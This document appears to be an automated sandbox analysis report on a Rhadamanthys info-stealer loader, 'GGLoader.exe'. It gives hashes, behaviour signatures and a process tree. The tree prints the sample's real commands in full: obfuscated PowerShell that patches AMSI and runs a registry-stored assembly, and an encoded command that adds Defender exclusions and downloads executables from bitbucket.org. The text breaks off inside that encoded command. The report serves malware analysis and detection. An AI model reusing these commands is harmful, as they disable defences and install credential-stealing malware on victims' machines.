Analysis

  • max time kernel
    44s
  • max time network
    44s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2024 17:05

General

  • Target

    GGLoader.exe

  • Size

    19KB

  • MD5

    982e4ae4559538cfb529dfaff0507880

  • SHA1

    a3b0e3989d6e40792134286e40448004ebeda077

  • SHA256

    95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd

  • SHA512

    35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f

  • SSDEEP

    384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 5 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:60
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{be6fbeda-2ae9-4726-b303-56e007d1464c}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3800
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:408
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1048
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1108
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1120
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1168
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2888
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:QlodJzXbhczV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uIchVbiIhdacrF,[Parameter(Position=1)][Type]$PhOEcmhkTp)$CEVeLtXONqw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+'De'+'l'+'e'+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'T'+'y'+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'lic'+','+'S'+'e'+''+[Char](97)+'l'+[Char](101)+'d'+','+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'ass'+[Char](44)+''+[Char](65)+''+'u'+'toC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CEVeLtXONqw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'ci'+'a'+'l'+[Char](78)+''+[Char](97)+'m'+'e'+''+[Char](44)+''+[Char](72)+''+'i'+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'P'+'u'+'b'+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uIchVbiIhdacrF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$CEVeLtXONqw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+'deB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'e'+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+','+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$PhOEcmhkTp,$uIchVbiIhdacrF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+'m'+''+'e'+''+','+''+'M'+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $CEVeLtXONqw.CreateType();}$zwCPOWnbPHNhj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+'t'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'W'+'i'+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](122)+''+'w'+''+[Char](67)+''+[Char](80)+''+'O'+'Wn'+'b'+''+'P'+''+[Char](72)+'N'+[Char](104)+'j');$pWMEMqJYEVTbbU=$zwCPOWnbPHNhj.GetMethod(''+[Char](112)+''+[Char](87)+''+'M'+'EM'+'q'+''+'J'+''+[Char](89)+''+'E'+''+[Char](86)+''+[Char](84)+'bb'+'U'+'',[Reflection.BindingFlags]'Pub'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PIlVJGJdjzEzKtFoHvM=QlodJzXbhczV @([String])([IntPtr]);$iRYrKAQVeAaAeQuFyPrnnT=QlodJzXbhczV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bXNzVTCLQbJ=$zwCPOWnbPHNhj.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Mod'+'u'+''+'l'+'eH'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+'n'+''+[Char](101)+'l3'+'2'+''+'.'+'d'+'l'+''+'l'+'')));$KLYfxddyQhHQMJ=$pWMEMqJYEVTbbU.Invoke($Null,@([Object]$bXNzVTCLQbJ,[Object](''+[Char](76)+''+[Char](111)+'ad'+[Char](76)+''+[Char](105)+'br'+[Char](97)+'r'+'y'+''+[Char](65)+'')));$faOvxInCzixgngEEX=$pWMEMqJYEVTbbU.Invoke($Null,@([Object]$bXNzVTCLQbJ,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$HeqbDgp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLYfxddyQhHQMJ,$PIlVJGJdjzEzKtFoHvM).Invoke('am'+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$IuUaBXLrrKNKqLwGc=$pWMEMqJYEVTbbU.Invoke($Null,@([Object]$HeqbDgp,[Object](''+[Char](65)+''+'m'+'s'+'i'+'S'+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+''+[Char](114)+'')));$PkJlyJKorW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($faOvxInCzixgngEEX,$iRYrKAQVeAaAeQuFyPrnnT).Invoke($IuUaBXLrrKNKqLwGc,[uint32]8,4,[ref]$PkJlyJKorW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$IuUaBXLrrKNKqLwGc,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($faOvxInCzixgngEEX,$iRYrKAQVeAaAeQuFyPrnnT).Invoke($IuUaBXLrrKNKqLwGc,[uint32]8,0x20,[ref]$PkJlyJKorW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+'a'+''+'l'+''+[Char](101)+''+'r'+''+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2884
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:4188
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DjWrpuQULLXA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yGiWqLoKzuOnvF,[Parameter(Position=1)][Type]$BDAPvPBTxU)$vIYNnwXlPWT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+','+'Se'+[Char](97)+'l'+[Char](101)+''+[Char](100)+','+[Char](65)+'n'+'s'+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$vIYNnwXlPWT.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'ci'+[Char](97)+'l'+[Char](78)+'am'+[Char](101)+','+[Char](72)+''+'i'+''+'d'+'e'+[Char](66)+'yS'+'i'+''+[Char](103)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yGiWqLoKzuOnvF).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+''+[Char](100)+'');$vIYNnwXlPWT.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+'o'+''+'t'+','+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$BDAPvPBTxU,$yGiWqLoKzuOnvF).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $vIYNnwXlPWT.CreateType();}$TtuKzFyShVnSw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+'e'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+'2.'+'U'+''+[Char](110)+''+[Char](115)+''+'a'+'feT'+[Char](116)+''+[Char](117)+'K'+[Char](122)+'F'+'y'+'S'+'h'+''+'V'+''+[Char](110)+''+[Char](83)+''+[Char](119)+'');$XbrjBmgCNtxsCs=$TtuKzFyShVnSw.GetMethod(''+[Char](88)+''+[Char](98)+''+[Char](114)+''+'j'+'B'+[Char](109)+''+'g'+''+'C'+''+[Char](78)+''+[Char](116)+''+[Char](120)+''+[Char](115)+''+[Char](67)+''+'s'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+','+'Sta'+'t'+''+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RFyMSRtTThUVsZfJqJB=DjWrpuQULLXA @([String])([IntPtr]);$TsJpVEJJmXiEEnClRoMCIN=DjWrpuQULLXA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QdzoEdiWRzL=$TtuKzFyShVnSw.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+'Ha'+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$GFUVWottdvKQci=$XbrjBmgCNtxsCs.Invoke($Null,@([Object]$QdzoEdiWRzL,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+'aryA')));$EehPiGaptRtqijYRM=$XbrjBmgCNtxsCs.Invoke($Null,@([Object]$QdzoEdiWRzL,[Object](''+[Char](86)+'irt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$GMLdgbX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GFUVWottdvKQci,$RFyMSRtTThUVsZfJqJB).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+'d'+''+'l'+'l');$KFdtpAmmSNhdSjLmT=$XbrjBmgCNtxsCs.Invoke($Null,@([Object]$GMLdgbX,[Object]('A'+[Char](109)+''+'s'+'i'+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$VjasnXmXMN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EehPiGaptRtqijYRM,$TsJpVEJJmXiEEnClRoMCIN).Invoke($KFdtpAmmSNhdSjLmT,[uint32]8,4,[ref]$VjasnXmXMN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KFdtpAmmSNhdSjLmT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EehPiGaptRtqijYRM,$TsJpVEJJmXiEEnClRoMCIN).Invoke($KFdtpAmmSNhdSjLmT,[uint32]8,0x20,[ref]$VjasnXmXMN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue('di'+'a'+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3376
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Indicator Removal: Clear Windows Event Logs
                        PID:1204
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1268
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1320
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1364
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2628
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1376
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1520
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1528
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1540
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1648
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1708
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1720
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1804
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1820
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1912
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1920
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1972
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1992
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1880
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2152
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                                PID:2192
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2300
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2432
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2440
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2668
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                          PID:2744
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2768
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2796
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2816
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2828
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:2932
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3108
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3448
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3472
                                                                                          • C:\Users\Admin\AppData\Local\Temp\GGLoader.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\GGLoader.exe"
                                                                                            2⤵
                                                                                            • Checks computer location settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1260
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH